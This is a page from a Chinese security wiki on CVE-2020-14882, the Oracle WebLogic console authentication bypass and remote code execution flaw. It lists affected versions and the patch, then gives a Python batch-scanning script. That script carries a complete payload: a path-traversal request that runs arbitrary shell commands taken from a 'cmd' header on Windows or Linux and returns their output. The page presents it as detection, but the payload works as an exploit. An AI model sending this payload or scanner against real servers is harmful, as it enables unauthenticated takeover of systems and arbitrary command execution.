menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right cve-2020-14882-weblogic越权绕过登录RCE批量检测.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    cve-2020-14882-weblogic越权绕过登录RCE批量检测.md
    3.24 KB / 2021-05-21 09:14:38
        # cve-2020-14882-weblogic越权绕过登录RCE批量检测


漏洞详情

未经身份验证的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,漏洞等级高危。

影响版本

Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。

漏洞地址

/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

修复建议

安装官方最新补丁进行升级:

https://www.oracle.com/security-alerts/cpuapr2020.html

批量检测

备注:遵守网络安全法,只给出核心代码,其中调试的时候遇到一个坑,服务器返回无法解析,需要调用python3里面的http_vsn_str用http1.0格式发包才能解决


```python
import http.client
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
headers={'Connection':'close',
'cmd':'echo 666'
}
payloads = [r"""/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""]
def http_request(url):
    try:
        print("Trying:" + url + ' ' + '[' + str(left) + '/' + str(countLines) + ']')
        for payload in payloads:
            try:
                vulurl = url + payload
                print(vulurl)
                r = requests.get(url=vulurl, headers=headers, timeout=10, verify= False)
                print(r.text)
                if r.status_code == 200 and '666' in r.text:
                    print("\033[1;40;32m[Vuln] {}\033[0m".format(vulurl))
                    print(r.text)
                    with open(path_out,'a') as f:
                        f.write(vulurl + '\n')
                        return
                else:
                    print("[-]" + "r.status_code:" + str(r.status_code) + "," + "raise.text:" + r.text)
            except Exception as err:
                print(err)
    except Exception as err:
        print(err)
```

via:六六
    links
    file_download